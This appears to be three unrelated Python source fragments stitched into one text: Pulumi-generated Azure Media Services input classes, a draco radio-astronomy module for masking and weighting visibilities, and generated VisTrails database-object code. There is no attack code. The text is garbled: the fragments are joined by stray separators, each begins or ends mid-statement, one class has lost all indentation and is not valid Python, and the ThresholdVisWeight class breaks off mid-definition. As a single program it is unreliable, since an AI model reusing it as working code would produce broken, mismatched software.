        The raw data field of a certificate in PKCS 12 format (X509Certificate2 in .NET). Specifies a certificate for token validation.
        """
        return pulumi.get(self, "primary_x509_token_key_raw")
    @primary_x509_token_key_raw.setter
    def primary_x509_token_key_raw(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "primary_x509_token_key_raw", value)
    @property
    @pulumi.getter(name="requiredClaims")
    def required_claims(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ContentKeyPolicyPolicyOptionTokenRestrictionRequiredClaimArgs']]]]:
        """
        One or more `required_claim` blocks as defined above.
        """
        return pulumi.get(self, "required_claims")
    @required_claims.setter
    def required_claims(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ContentKeyPolicyPolicyOptionTokenRestrictionRequiredClaimArgs']]]]):
        pulumi.set(self, "required_claims", value)
    @property
    @pulumi.getter(name="tokenType")
    def token_type(self) -> Optional[pulumi.Input[str]]:
        """
        The type of token. Supported values are `Jwt` or `Swt`.
        """
        return pulumi.get(self, "token_type")
    @token_type.setter
    def token_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "token_type", value)
@pulumi.input_type
class ContentKeyPolicyPolicyOptionTokenRestrictionRequiredClaimArgs:
    # Generated pulumi input type: a single required token claim
    # (type/value pair) for a token-restriction policy option.
    def __init__(__self__, *,
                 type: Optional[pulumi.Input[str]] = None,
                 value: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] type: Token claim type.
        :param pulumi.Input[str] value: Token claim value.
        """
        if type is not None:
            pulumi.set(__self__, "type", type)
        if value is not None:
            pulumi.set(__self__, "value", value)
    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        """
        Token claim type.
        """
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)
    @property
    @pulumi.getter
    def value(self) -> Optional[pulumi.Input[str]]:
        """
        Token claim value.
        """
        return pulumi.get(self, "value")
    @value.setter
    def value(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "value", value)
@pulumi.input_type
class JobInputAssetArgs:
    # Generated pulumi input type describing the input asset of a Media Job.
    def __init__(__self__, *,
                 name: pulumi.Input[str],
                 label: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] name: The name of the input Asset. Changing this forces a new Media Job to be created.
        :param pulumi.Input[str] label: A label that is assigned to a JobInputClip, that is used to satisfy a reference used in the Transform. For example, a Transform can be authored so as to take an image file with the label 'xyz' and apply it as an overlay onto the input video before it is encoded. When submitting a Job, exactly one of the JobInputs should be the image file, and it should have the label 'xyz'.
        """
        pulumi.set(__self__, "name", name)
        if label is not None:
            pulumi.set(__self__, "label", label)
    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        The name of the input Asset. Changing this forces a new Media Job to be created.
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter
    def label(self) -> Optional[pulumi.Input[str]]:
        """
        A label that is assigned to a JobInputClip, that is used to satisfy a reference used in the Transform. For example, a Transform can be authored so as to take an image file with the label 'xyz' and apply it as an overlay onto the input video before it is encoded. When submitting a Job, exactly one of the JobInputs should be the image file, and it should have the label 'xyz'.
        """
        return pulumi.get(self, "label")
    @label.setter
    def label(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "label", value)
@pulumi.input_type
class JobOutputAssetArgs:
    # Generated pulumi input type describing an output asset of a Media Job.
    def __init__(__self__, *,
                 name: pulumi.Input[str],
                 label: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] name: The name of the output Asset. Changing this forces a new Media Job to be created.
        :param pulumi.Input[str] label: A label that is assigned to a JobOutput in order to help uniquely identify it. This is useful when your Transform has more than one TransformOutput, whereby your Job has more than one JobOutput. In such cases, when you submit the Job, you will add two or more JobOutputs, in the same order as TransformOutputs in the Transform. Subsequently, when you retrieve the Job, either through events or on a GET request, you can use the label to easily identify the JobOutput. If a label is not provided, a default value of '{presetName}_{outputIndex}' will be used, where the preset name is the name of the preset in the corresponding TransformOutput and the output index is the relative index of the this JobOutput within the Job. Note that this index is the same as the relative index of the corresponding TransformOutput within its Transform.
        """
        pulumi.set(__self__, "name", name)
        if label is not None:
            pulumi.set(__self__, "label", label)
    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        The name of the output Asset. Changing this forces a new Media Job to be created.
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter
    def label(self) -> Optional[pulumi.Input[str]]:
        """
        A label that is assigned to a JobOutput in order to help uniquely identify it. This is useful when your Transform has more than one TransformOutput, whereby your Job has more than one JobOutput. In such cases, when you submit the Job, you will add two or more JobOutputs, in the same order as TransformOutputs in the Transform. Subsequently, when you retrieve the Job, either through events or on a GET request, you can use the label to easily identify the JobOutput. If a label is not provided, a default value of '{presetName}_{outputIndex}' will be used, where the preset name is the name of the preset in the corresponding TransformOutput and the output index is the relative index of the this JobOutput within the Job. Note that this index is the same as the relative index of the corresponding TransformOutput within its Transform.
        """
        return pulumi.get(self, "label")
    @label.setter
    def label(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "label", value)
@pulumi.input_type
class LiveEventCrossSiteAccessPolicyArgs:
    # Generated pulumi input type for a Live Event's cross-site access
    # policy (Silverlight clientaccesspolicy.xml / Flash crossdomain.xml).
    def __init__(__self__, *,
                 client_access_policy: Optional[pulumi.Input[str]] = None,
                 cross_domain_policy: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] client_access_policy: The content of clientaccesspolicy.xml used by Silverlight.
        :param pulumi.Input[str] cross_domain_policy: The content of the Cross Domain Policy (`crossdomain.xml`).
        """
        if client_access_policy is not None:
            pulumi.set(__self__, "client_access_policy", client_access_policy)
        if cross_domain_policy is not None:
            pulumi.set(__self__, "cross_domain_policy", cross_domain_policy)
    @property
    @pulumi.getter(name="clientAccessPolicy")
    def client_access_policy(self) -> Optional[pulumi.Input[str]]:
        """
        The content of clientaccesspolicy.xml used by Silverlight.
        """
        return pulumi.get(self, "client_access_policy")
    @client_access_policy.setter
    def client_access_policy(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "client_access_policy", value)
    @property
    @pulumi.getter(name="crossDomainPolicy")
    def cross_domain_policy(self) -> Optional[pulumi.Input[str]]:
        """
        The content of the Cross Domain Policy (`crossdomain.xml`).
        """
        return pulumi.get(self, "cross_domain_policy")
    @cross_domain_policy.setter
    def cross_domain_policy(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "cross_domain_policy", value)
@pulumi.input_type
class LiveEventEncodingArgs:
def __init__(__self__, *,
key_frame_interval: Optional[pulumi.Input[str]] = None,
preset_name: Optional[pulumi.Input[str]] = None,
stretch_mode: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] key_frame_interval: Use an `ISO 8601` time value between 0.5 to 20 seconds to specify the output fragment length for the video and audio tracks of an encoding live event. For example, use `PT2S` to indicate 2 seconds. For the video track it also defines the key frame interval, or the length of a GoP (group of pictures). If this value is not set for an encoding live event, the fragment duration defaults to 2 seconds. The value cannot be set for pass-through live events.
:param pulumi.Input[str] preset_name: The optional encoding preset name, used when `type` is not `None`. If the `type` is set to `Standard`, then the default preset name is `Default720p`. Else if the `type` is set to `Premium1080p`, the default preset is `Default1080p`. Changing this forces a new resource to be created.
:param pulumi.Input[str] stretch_mode: Specifies how the input video will be resized to fit the desired output resolution(s). Allowed values are `None`, `AutoFit` or `AutoSize`. Default is `None`.
:param pulumi.Input[str] type: Live event type. Allowed values are `None`, `Premium1080p` or `Standard`. When set to `None`, the service simply passes through the incoming video and audio layer(s) to the output. When `type` is set to `Standard` or `Premium1080p`, a live encoder transcodes the incoming stream into multiple bitrates or layers. Defaults to `None`. Changing this forces a new resource to be created.
"""
if key_frame_interval is not None:
pulumi.set(__self__, "key_frame_interval", key_frame_interval)
| |
<filename>draco/analysis/flagging.py
"""Tasks for flagging out bad or unwanted data.
This includes data quality flagging on timestream data; sun excision on sidereal
data; and pre-map making flagging on m-modes.
Tasks
=====
.. autosummary::
:toctree:
DayMask
MaskData
MaskBaselines
RadiometerWeight
SmoothVisWeight
ThresholdVisWeight
RFIMask
RFISensitivityMask
"""
import numpy as np
from scipy.ndimage import median_filter
from caput import config, weighted_median, mpiarray
from ..core import task, containers, io
from ..util import tools
from ..util import rfi
class DayMask(task.SingleTask):
    """Crudely simulate a masking out of the daytime data.

    Attributes
    ----------
    start, end : float
        Start and end of masked out region.
    width : float
        Use a smooth transition of given width between the fully masked and
        unmasked data. This is interior to the region marked by start and end.
    zero_data : bool, optional
        Zero the data in addition to modifying the noise weights
        (default is True).
    remove_average : bool, optional
        Estimate and remove the mean level from each visibilty. This estimate
        does not use data from the masked region.
    """

    start = config.Property(proptype=float, default=90.0)
    end = config.Property(proptype=float, default=270.0)

    width = config.Property(proptype=float, default=60.0)

    zero_data = config.Property(proptype=bool, default=True)
    remove_average = config.Property(proptype=bool, default=True)

    def process(self, sstream):
        """Apply a day time mask.

        Parameters
        ----------
        sstream : containers.SiderealStream
            Unmasked sidereal stack.

        Returns
        -------
        mstream : containers.SiderealStream
            Masked sidereal stream.
        """

        sstream.redistribute("freq")

        # Shift the RA coordinate so the masked region starts at zero; this
        # makes the comparisons below insensitive to wrap-around at 360 deg.
        ra_shift = (sstream.ra[:] - self.start) % 360.0
        end_shift = (self.end - self.start) % 360.0

        # Crudely mask the on and off regions
        mask_bool = ra_shift > end_shift

        # Put in the transition at the start of the day
        mask = np.where(
            ra_shift < self.width,
            0.5 * (1 + np.cos(np.pi * (ra_shift / self.width))),
            mask_bool,
        )

        # Put the transition at the end of the day
        mask = np.where(
            np.logical_and(ra_shift > end_shift - self.width, ra_shift <= end_shift),
            0.5 * (1 + np.cos(np.pi * ((ra_shift - end_shift) / self.width))),
            mask,
        )

        if self.remove_average:
            # Estimate the mean level from the unmasked data only: masked
            # samples are set to NaN and ignored by nanmedian.
            # FIX: use np.nanmedian here -- scipy.stats.nanmedian was
            # deprecated in SciPy 0.15 and removed in SciPy 1.0.
            nanvis = (
                sstream.vis[:]
                * np.where(mask_bool, 1.0, np.nan)[np.newaxis, np.newaxis, :]
            )
            average = np.nanmedian(nanvis, axis=-1)[:, :, np.newaxis]
            sstream.vis[:] -= average

        # Apply the mask to the data
        if self.zero_data:
            sstream.vis[:] *= mask

        # Modify the noise weights
        sstream.weight[:] *= mask ** 2

        return sstream
class MaskData(task.SingleTask):
    """Mask out data ahead of map making.

    Attributes
    ----------
    auto_correlations : bool
        Exclude auto correlations if set (default=False).
    m_zero : bool
        Ignore the m=0 mode (default=False).
    positive_m : bool
        Include positive m-modes (default=True).
    negative_m : bool
        Include negative m-modes (default=True).
    """

    auto_correlations = config.Property(proptype=bool, default=False)
    m_zero = config.Property(proptype=bool, default=False)
    positive_m = config.Property(proptype=bool, default=True)
    negative_m = config.Property(proptype=bool, default=True)

    def process(self, mmodes):
        """Mask out unwanted data in the m-modes.

        Parameters
        ----------
        mmodes : containers.MModes

        Returns
        -------
        mmodes : containers.MModes
        """

        mmodes.redistribute("freq")

        weight = mmodes.weight[:]

        # Zero the weight of every auto-correlation product unless they were
        # explicitly requested.
        if not self.auto_correlations:
            for prod_ind, (input_i, input_j) in enumerate(mmodes.prodstack):
                if input_i == input_j:
                    weight[..., prod_ind] = 0.0

        # Apply the m-based masks by zeroing the corresponding weights.
        if not self.m_zero:
            weight[0] = 0.0

        if not self.positive_m:
            weight[1:, 0] = 0.0

        if not self.negative_m:
            weight[1:, 1] = 0.0

        return mmodes
class MaskBaselines(task.SingleTask):
    """Mask out baselines from a dataset.

    This task may produce output with shared datasets. Be warned that
    this can produce unexpected outputs if not properly taken into
    account.

    Attributes
    ----------
    mask_long_ns : float
        Mask out baselines longer than a given distance in the N/S direction.
    mask_short : float
        Mask out baselines shorter than a given distance.
    mask_short_ew : float
        Mask out baselines shorter then a given distance in the East-West
        direction. Useful for masking out intra-cylinder baselines for
        North-South oriented cylindrical telescopes.
    zero_data : bool, optional
        Zero the data in addition to modifying the noise weights
        (default is False).
    share : {"all", "none", "vis"}
        Which datasets should we share with the input. If "none" we create a
        full copy of the data, if "vis" we create a copy only of the modified
        weight dataset and the unmodified vis dataset is shared, if "all" we
        modify in place and return the input container.
    """

    mask_long_ns = config.Property(proptype=float, default=None)
    mask_short = config.Property(proptype=float, default=None)
    mask_short_ew = config.Property(proptype=float, default=None)

    zero_data = config.Property(proptype=bool, default=False)

    share = config.enum(["none", "vis", "all"], default="all")

    def setup(self, telescope):
        """Set the telescope model.

        Parameters
        ----------
        telescope : TransitTelescope
        """
        self.telescope = io.get_telescope(telescope)

        if self.zero_data and self.share == "vis":
            # FIX: Logger.warn is a deprecated alias of Logger.warning.
            self.log.warning(
                "Setting `zero_data = True` and `share = vis` doesn't make much sense."
            )

    def process(self, ss):
        """Apply the mask to data.

        Parameters
        ----------
        ss : SiderealStream or TimeStream
            Data to mask. Applied in place.
        """

        ss.redistribute("freq")

        baselines = self.telescope.baselines
        mask = np.ones_like(ss.weight[:], dtype=bool)

        if self.mask_long_ns is not None:
            # Keep only baselines shorter than `mask_long_ns` in the N/S direction.
            long_ns_mask = np.abs(baselines[:, 1]) < self.mask_long_ns
            mask *= long_ns_mask[np.newaxis, :, np.newaxis]

        if self.mask_short is not None:
            # Keep only baselines with total length greater than `mask_short`.
            short_mask = np.sum(baselines ** 2, axis=1) ** 0.5 > self.mask_short
            mask *= short_mask[np.newaxis, :, np.newaxis]

        if self.mask_short_ew is not None:
            # Keep only baselines with E-W separation greater than `mask_short_ew`.
            short_ew_mask = baselines[:, 0] > self.mask_short_ew
            mask *= short_ew_mask[np.newaxis, :, np.newaxis]

        if self.share == "all":
            ssc = ss
        elif self.share == "vis":
            ssc = ss.copy(shared=("vis",))
        else:  # self.share == "none"  (FIX: comment previously said "all")
            ssc = ss.copy()

        # Apply the mask to the weight
        ssc.weight[:] *= mask

        # Apply the mask to the data
        if self.zero_data:
            ssc.vis[:] *= mask

        return ssc
class RadiometerWeight(task.SingleTask):
    r"""Update vis_weight according to the radiometer equation:

    .. math::

        \text{weight}_{ij} = N_\text{samp} / V_{ii} V_{jj}

    Attributes
    ----------
    replace : bool, optional
        Replace any existing weights (default). If `False` then we multiply the
        existing weights by the radiometer values.
    """
    # NOTE: the docstring above is a raw string on purpose -- in the original
    # non-raw string the `\t` of `\text` was interpreted as a tab escape,
    # corrupting the rendered LaTeX.

    replace = config.Property(proptype=bool, default=True)

    def process(self, stream):
        """Change the vis weight.

        Parameters
        ----------
        stream : SiderealStream or TimeStream
            Data to be weighted. This is done in place.

        Returns
        --------
        stream : SiderealStream or TimeStream
        """

        from caput.time import STELLAR_S

        # Redistribute over the frequency direction
        stream.redistribute("freq")

        ninput = len(stream.index_map["input"])
        nprod = len(stream.index_map["prod"])

        if nprod != (ninput * (ninput + 1) // 2):
            raise RuntimeError(
                "Must have a input stream with the full correlation triangle."
            )

        freq_width = np.median(stream.index_map["freq"]["width"])

        if isinstance(stream, containers.SiderealStream):
            RA_S = 240 * STELLAR_S  # SI seconds in 1 deg of RA change
            int_time = np.median(np.abs(np.diff(stream.ra))) / RA_S
        else:
            int_time = np.median(np.abs(np.diff(stream.index_map["time"])))

        if self.replace:
            stream.weight[:] = 1.0

        # Construct and set the correct weights in place.
        # freq_width is in MHz, hence the 1e6 to get a sample count.
        nsamp = 1e6 * freq_width * int_time
        autos = tools.extract_diagonal(stream.vis[:]).real
        weight_fac = nsamp ** 0.5 / autos
        tools.apply_gain(stream.weight[:], weight_fac, out=stream.weight[:])

        # Return timestream with updated weights
        return stream
class SmoothVisWeight(task.SingleTask):
    """Smooth the visibility weights with a median filter.

    This is done in-place.

    Attributes
    ----------
    kernel_size : int
        Size of the kernel for the median filter in time points.
        Default is 31, corresponding to ~5 minutes window for 10s cadence data.
    """

    # 31 time points correspond to ~ 5min in 10s cadence
    kernel_size = config.Property(proptype=int, default=31)

    def process(self, data):
        """Smooth the weights with a median filter.

        Parameters
        ----------
        data : :class:`andata.CorrData` or :class:`containers.TimeStream` object
            Data containing the weights to be smoothed

        Returns
        -------
        data : Same object as data
            Data object containing the same data as the input, but with the
            weights substituted by the smoothed ones.
        """

        # Ensure data is distributed in frequency:
        data.redistribute("freq")
        # Full slice returns an MPIArray
        weight = data.weight[:]
        # Data will be distributed in frequency.
        # So a frequency loop will not be too large.
        for lfi, gfi in weight.enumerate(axis=0):
            # MPIArray takes the local index, returns a local np.ndarray
            # Find values equal to zero to preserve them in final weights
            zeromask = weight[lfi] == 0.0
            # Median filter. Mode='nearest' to prevent steps close to
            # the end from being washed. The kernel spans only the time
            # axis (size=(1, kernel_size)); frequencies are not mixed.
            weight[lfi] = median_filter(
                weight[lfi], size=(1, self.kernel_size), mode="nearest"
            )
            # Ensure zero values are zero
            weight[lfi][zeromask] = 0.0

        return data
class ThresholdVisWeight(task.SingleTask):
"""Set any weight less than the user specified threshold equal to zero.
Threshold is determined as `maximum(absolute_threshold,
relative_threshold * mean(weight))` and is evaluated per product/stack
entry.
Parameters
----------
absolute_threshold : float
Any weights with values less than this number will be set to zero.
relative_threshold : float
Any weights with values less than this number times the average weight
will be set to zero.
"""
absolute_threshold = config.Property(proptype=float, default=1e-7)
relative_threshold = config.Property(proptype=float, | |
= False
for i in xrange(len(self._db_actions)):
if self._db_actions[i].db_id == action.db_id:
self._db_actions[i] = action
found = True
break
if not found:
self._db_actions.append(action)
self.db_actions_id_index[action.db_id] = action
def db_delete_action(self, action):
    """Remove the action with `action`'s id from the list and the id index.

    Actions that have already been persisted (``is_new`` false) are kept in
    ``db_deleted_actions`` so the deletion can be written back to storage.
    """
    self.is_dirty = True
    for i in xrange(len(self._db_actions)):
        if self._db_actions[i].db_id == action.db_id:
            if not self._db_actions[i].is_new:
                self.db_deleted_actions.append(self._db_actions[i])
            del self._db_actions[i]
            break
    # NOTE(review): raises KeyError when the id is absent from the index;
    # presumably callers only delete actions known to be present -- confirm.
    del self.db_actions_id_index[action.db_id]

def db_get_action(self, key):
    """Return the action whose db_id equals `key` (linear scan), else None."""
    for i in xrange(len(self._db_actions)):
        if self._db_actions[i].db_id == key:
            return self._db_actions[i]
    return None

def db_get_action_by_id(self, key):
    """Return the action with id `key` via the index (KeyError if missing)."""
    return self.db_actions_id_index[key]

def db_has_action_with_id(self, key):
    """Return True if an action with id `key` exists."""
    return key in self.db_actions_id_index
# --- db_tags: generated property plus list/index maintenance helpers ---
def __get_db_tags(self):
    return self._db_tags

def __set_db_tags(self, tags):
    # Replacing the whole list marks the object dirty but does NOT rebuild
    # the id/name indices (generated-code behavior).
    self._db_tags = tags
    self.is_dirty = True
db_tags = property(__get_db_tags, __set_db_tags)

def db_get_tags(self):
    """Return the list of tags (same object as the db_tags property)."""
    return self._db_tags

def db_add_tag(self, tag):
    """Append `tag` and register it in the id and name indices."""
    self.is_dirty = True
    self._db_tags.append(tag)
    self.db_tags_id_index[tag.db_id] = tag
    self.db_tags_name_index[tag.db_name] = tag

def db_change_tag(self, tag):
    """Replace the tag with the same id in place, or append if not found."""
    self.is_dirty = True
    found = False
    for i in xrange(len(self._db_tags)):
        if self._db_tags[i].db_id == tag.db_id:
            self._db_tags[i] = tag
            found = True
            break
    if not found:
        self._db_tags.append(tag)
    self.db_tags_id_index[tag.db_id] = tag
    self.db_tags_name_index[tag.db_name] = tag

def db_delete_tag(self, tag):
    """Remove the tag with `tag`'s id; persisted tags go to db_deleted_tags."""
    self.is_dirty = True
    for i in xrange(len(self._db_tags)):
        if self._db_tags[i].db_id == tag.db_id:
            if not self._db_tags[i].is_new:
                self.db_deleted_tags.append(self._db_tags[i])
            del self._db_tags[i]
            break
    del self.db_tags_id_index[tag.db_id]
    del self.db_tags_name_index[tag.db_name]

def db_get_tag(self, key):
    """Return the tag whose db_id equals `key` (linear scan), else None."""
    for i in xrange(len(self._db_tags)):
        if self._db_tags[i].db_id == key:
            return self._db_tags[i]
    return None

def db_get_tag_by_id(self, key):
    """Index lookup by id (KeyError if missing)."""
    return self.db_tags_id_index[key]

def db_has_tag_with_id(self, key):
    return key in self.db_tags_id_index

def db_get_tag_by_name(self, key):
    """Index lookup by name (KeyError if missing)."""
    return self.db_tags_name_index[key]

def db_has_tag_with_name(self, key):
    return key in self.db_tags_name_index
# --- db_annotations: generated property plus list/index maintenance helpers ---
def __get_db_annotations(self):
    return self._db_annotations

def __set_db_annotations(self, annotations):
    # Replacing the whole list does not rebuild the id/key indices.
    self._db_annotations = annotations
    self.is_dirty = True
db_annotations = property(__get_db_annotations, __set_db_annotations)

def db_get_annotations(self):
    """Return the list of annotations (same object as the property)."""
    return self._db_annotations

def db_add_annotation(self, annotation):
    """Append `annotation` and register it in the id and key indices."""
    self.is_dirty = True
    self._db_annotations.append(annotation)
    self.db_annotations_id_index[annotation.db_id] = annotation
    self.db_annotations_key_index[annotation.db_key] = annotation

def db_change_annotation(self, annotation):
    """Replace the annotation with the same id in place, or append it."""
    self.is_dirty = True
    found = False
    for i in xrange(len(self._db_annotations)):
        if self._db_annotations[i].db_id == annotation.db_id:
            self._db_annotations[i] = annotation
            found = True
            break
    if not found:
        self._db_annotations.append(annotation)
    self.db_annotations_id_index[annotation.db_id] = annotation
    self.db_annotations_key_index[annotation.db_key] = annotation

def db_delete_annotation(self, annotation):
    """Remove the annotation with `annotation`'s id; keep persisted ones in
    db_deleted_annotations for write-back."""
    self.is_dirty = True
    for i in xrange(len(self._db_annotations)):
        if self._db_annotations[i].db_id == annotation.db_id:
            if not self._db_annotations[i].is_new:
                self.db_deleted_annotations.append(self._db_annotations[i])
            del self._db_annotations[i]
            break
    del self.db_annotations_id_index[annotation.db_id]
    del self.db_annotations_key_index[annotation.db_key]

def db_get_annotation(self, key):
    """Return the annotation whose db_id equals `key` (linear scan), else None."""
    for i in xrange(len(self._db_annotations)):
        if self._db_annotations[i].db_id == key:
            return self._db_annotations[i]
    return None

def db_get_annotation_by_id(self, key):
    return self.db_annotations_id_index[key]

def db_has_annotation_with_id(self, key):
    return key in self.db_annotations_id_index

def db_get_annotation_by_key(self, key):
    return self.db_annotations_key_index[key]

def db_has_annotation_with_key(self, key):
    return key in self.db_annotations_key_index

def getPrimaryKey(self):
    """Return the primary key (the raw db_id) of this object."""
    return self._db_id
class DBModuleExec(object):
vtType = 'module_exec'
def __init__(self, id=None, ts_start=None, ts_end=None, cached=None, module_id=None, module_name=None, completed=None, error=None, abstraction_id=None, abstraction_version=None, machine_id=None, annotations=None, loop_execs=None):
    """Initialize a module-execution record.

    All scalar fields are stored as-is; `annotations` and `loop_execs`
    are child-object lists for which id-keyed lookup indices are built.
    A freshly constructed object is marked both dirty and new.
    """
    self._db_id = id
    self._db_ts_start = ts_start
    self._db_ts_end = ts_end
    self._db_cached = cached
    self._db_module_id = module_id
    self._db_module_name = module_name
    self._db_completed = completed
    self._db_error = error
    self._db_abstraction_id = abstraction_id
    self._db_abstraction_version = abstraction_version
    self._db_machine_id = machine_id
    self.db_deleted_annotations = []
    self.db_annotations_id_index = {}
    if annotations is None:
        self._db_annotations = []
    else:
        self._db_annotations = annotations
        # Build the id -> annotation lookup index.
        for v in self._db_annotations:
            self.db_annotations_id_index[v.db_id] = v
    self.db_deleted_loop_execs = []
    self.db_loop_execs_id_index = {}
    if loop_execs is None:
        self._db_loop_execs = []
    else:
        self._db_loop_execs = loop_execs
        # Build the id -> loop_exec lookup index.
        for v in self._db_loop_execs:
            self.db_loop_execs_id_index[v.db_id] = v
    self.is_dirty = True
    self.is_new = True
def __copy__(self):
    return DBModuleExec.do_copy(self)

def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
    """Deep-copy this object (children are copied recursively).

    When `new_ids` is true, a fresh id is allocated from `id_scope` and the
    (type, old_id) -> new_id mapping is recorded in `id_remap`; foreign-key
    fields (module_id, machine_id) are rewritten through `id_remap`.
    """
    cp = DBModuleExec(id=self._db_id,
                      ts_start=self._db_ts_start,
                      ts_end=self._db_ts_end,
                      cached=self._db_cached,
                      module_id=self._db_module_id,
                      module_name=self._db_module_name,
                      completed=self._db_completed,
                      error=self._db_error,
                      abstraction_id=self._db_abstraction_id,
                      abstraction_version=self._db_abstraction_version,
                      machine_id=self._db_machine_id)
    if self._db_annotations is None:
        cp._db_annotations = []
    else:
        cp._db_annotations = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_annotations]
    if self._db_loop_execs is None:
        cp._db_loop_execs = []
    else:
        cp._db_loop_execs = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_loop_execs]

    # set new ids
    if new_ids:
        new_id = id_scope.getNewId(self.vtType)
        if self.vtType in id_scope.remap:
            id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
        else:
            id_remap[(self.vtType, self.db_id)] = new_id
        cp.db_id = new_id
    # Rewrite foreign keys through the remap table when a mapping exists.
    if hasattr(self, 'db_module_id') and ('module', self._db_module_id) in id_remap:
        cp._db_module_id = id_remap[('module', self._db_module_id)]
    if hasattr(self, 'db_machine_id') and ('machine', self._db_machine_id) in id_remap:
        cp._db_machine_id = id_remap[('machine', self._db_machine_id)]

    # recreate indices and set flags
    cp.db_annotations_id_index = dict((v.db_id, v) for v in cp._db_annotations)
    cp.db_loop_execs_id_index = dict((v.db_id, v) for v in cp._db_loop_execs)
    if not new_ids:
        cp.is_dirty = self.is_dirty
        cp.is_new = self.is_new
    return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
    """Copy `old_obj` into `new_obj` (a fresh DBModuleExec by default),
    applying per-field translation callables from `trans_dict`.

    `trans_dict` maps a class name to a dict of field name -> callable
    taking (old_obj, trans_dict); when a callable exists it produces the
    new field value, otherwise the old value is copied verbatim (fields
    that are None on the old object are skipped).
    """
    if new_obj is None:
        new_obj = DBModuleExec()
    class_dict = {}
    if new_obj.__class__.__name__ in trans_dict:
        class_dict = trans_dict[new_obj.__class__.__name__]
    # --- scalar fields: translate if registered, else copy verbatim ---
    if 'id' in class_dict:
        res = class_dict['id'](old_obj, trans_dict)
        new_obj.db_id = res
    elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
        new_obj.db_id = old_obj.db_id
    if 'ts_start' in class_dict:
        res = class_dict['ts_start'](old_obj, trans_dict)
        new_obj.db_ts_start = res
    elif hasattr(old_obj, 'db_ts_start') and old_obj.db_ts_start is not None:
        new_obj.db_ts_start = old_obj.db_ts_start
    if 'ts_end' in class_dict:
        res = class_dict['ts_end'](old_obj, trans_dict)
        new_obj.db_ts_end = res
    elif hasattr(old_obj, 'db_ts_end') and old_obj.db_ts_end is not None:
        new_obj.db_ts_end = old_obj.db_ts_end
    if 'cached' in class_dict:
        res = class_dict['cached'](old_obj, trans_dict)
        new_obj.db_cached = res
    elif hasattr(old_obj, 'db_cached') and old_obj.db_cached is not None:
        new_obj.db_cached = old_obj.db_cached
    if 'module_id' in class_dict:
        res = class_dict['module_id'](old_obj, trans_dict)
        new_obj.db_module_id = res
    elif hasattr(old_obj, 'db_module_id') and old_obj.db_module_id is not None:
        new_obj.db_module_id = old_obj.db_module_id
    if 'module_name' in class_dict:
        res = class_dict['module_name'](old_obj, trans_dict)
        new_obj.db_module_name = res
    elif hasattr(old_obj, 'db_module_name') and old_obj.db_module_name is not None:
        new_obj.db_module_name = old_obj.db_module_name
    if 'completed' in class_dict:
        res = class_dict['completed'](old_obj, trans_dict)
        new_obj.db_completed = res
    elif hasattr(old_obj, 'db_completed') and old_obj.db_completed is not None:
        new_obj.db_completed = old_obj.db_completed
    if 'error' in class_dict:
        res = class_dict['error'](old_obj, trans_dict)
        new_obj.db_error = res
    elif hasattr(old_obj, 'db_error') and old_obj.db_error is not None:
        new_obj.db_error = old_obj.db_error
    if 'abstraction_id' in class_dict:
        res = class_dict['abstraction_id'](old_obj, trans_dict)
        new_obj.db_abstraction_id = res
    elif hasattr(old_obj, 'db_abstraction_id') and old_obj.db_abstraction_id is not None:
        new_obj.db_abstraction_id = old_obj.db_abstraction_id
    if 'abstraction_version' in class_dict:
        res = class_dict['abstraction_version'](old_obj, trans_dict)
        new_obj.db_abstraction_version = res
    elif hasattr(old_obj, 'db_abstraction_version') and old_obj.db_abstraction_version is not None:
        new_obj.db_abstraction_version = old_obj.db_abstraction_version
    if 'machine_id' in class_dict:
        res = class_dict['machine_id'](old_obj, trans_dict)
        new_obj.db_machine_id = res
    elif hasattr(old_obj, 'db_machine_id') and old_obj.db_machine_id is not None:
        new_obj.db_machine_id = old_obj.db_machine_id
    # --- child lists: recurse through each child's own update_version ---
    if 'annotations' in class_dict:
        res = class_dict['annotations'](old_obj, trans_dict)
        for obj in res:
            new_obj.db_add_annotation(obj)
    elif hasattr(old_obj, 'db_annotations') and old_obj.db_annotations is not None:
        for obj in old_obj.db_annotations:
            new_obj.db_add_annotation(DBAnnotation.update_version(obj, trans_dict))
    if hasattr(old_obj, 'db_deleted_annotations') and hasattr(new_obj, 'db_deleted_annotations'):
        for obj in old_obj.db_deleted_annotations:
            n_obj = DBAnnotation.update_version(obj, trans_dict)
            new_obj.db_deleted_annotations.append(n_obj)
    if 'loop_execs' in class_dict:
        res = class_dict['loop_execs'](old_obj, trans_dict)
        for obj in res:
            new_obj.db_add_loop_exec(obj)
    elif hasattr(old_obj, 'db_loop_execs') and old_obj.db_loop_execs is not None:
        for obj in old_obj.db_loop_execs:
            new_obj.db_add_loop_exec(DBLoopExec.update_version(obj, trans_dict))
    if hasattr(old_obj, 'db_deleted_loop_execs') and hasattr(new_obj, 'db_deleted_loop_execs'):
